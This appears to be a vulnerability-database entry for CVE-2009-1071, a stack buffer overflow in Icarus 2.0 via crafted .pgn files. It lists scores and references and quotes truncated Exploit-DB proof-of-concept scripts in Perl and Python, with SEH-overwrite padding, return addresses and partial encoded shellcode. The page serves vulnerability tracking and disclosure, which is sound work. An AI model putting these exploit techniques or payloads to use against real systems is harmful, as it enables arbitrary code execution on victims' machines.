CVE-2009-1071
published 2009-03-26CVE-2009-1071: Stack-based buffer overflow in Icarus 2.0 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted…
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
6.03%
92.4th percentile
Stack-based buffer overflow in Icarus 2.0 allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted Portable Game Notation (.pgn) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| randomsoftware | icarus | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)
exploitdb·2009-09-10
CVE-2009-1071 Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)
Icarus 2.0 - '.pgn' Universal Local Buffer Overflow (SEH)
---
#!/user/bin/perl
#Icarus 2.0 (.PGn File)Universal Local BOF (SEH)
#tested on win SP2
#origenal exploit : http://milw0rm.com/exploits/8236
#Author: germaya_x & D3v!LFUCK3R
#Download :http://www.randomsoftware.com/pub/icarus.exe
#GreTz [2] :his0k4 , Eddy_BAck0o , THE INJECTOR , ALL : www.lezr.com members :)
#fuck To: RoMaNcYxHaCkEr & alnjm33 & ALL www.sec-war.com :)
#############################################################
my $bof="A" x 332 ;
my $NEXT_sEh="\xEB\x06\x90\x90";
my $SEH="\x3F\xB2\x2E\x66";#hnetcfg.DLL
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x4
Exploit-DB
Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)
exploitdb·2009-03-18
CVE-2009-1071 Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)
Icarus 2.0 - '.pgn' Local Stack Overflow (SEH)
---
#usage: exploit.py
print "********************************************************************"
print " Icarus 2.0 Local Stack Overflow Exploit\n"
print " Download: http://www.randomsoftware.com/pub/icarus.exe"
print " Author : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz)\n"
print " Tip of the day: Klimontayne fe romayne :D"
print "********************************************************************\n\n"
payload1 = "\x41" * 336
payload1 += "\x5D\x38\x82\x7C" # call esp kernel32.dll (sp2)
payload1 += "\x90" * 19 #some nops
payload1 += "\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
payload1 += "\x4e\xf9\x9f\x83\xeb\xfc\xe2\xf4\xc4\xa6\xbd\x9f\x38\
No writeups or analysis indexed.
http://osvdb.org/52780http://secunia.com/advisories/34368http://www.securityfocus.com/bid/34167https://exchange.xforce.ibmcloud.com/vulnerabilities/49309https://www.exploit-db.com/exploits/8236http://osvdb.org/52780http://secunia.com/advisories/34368http://www.securityfocus.com/bid/34167https://exchange.xforce.ibmcloud.com/vulnerabilities/49309https://www.exploit-db.com/exploits/8236
2009-03-26
Published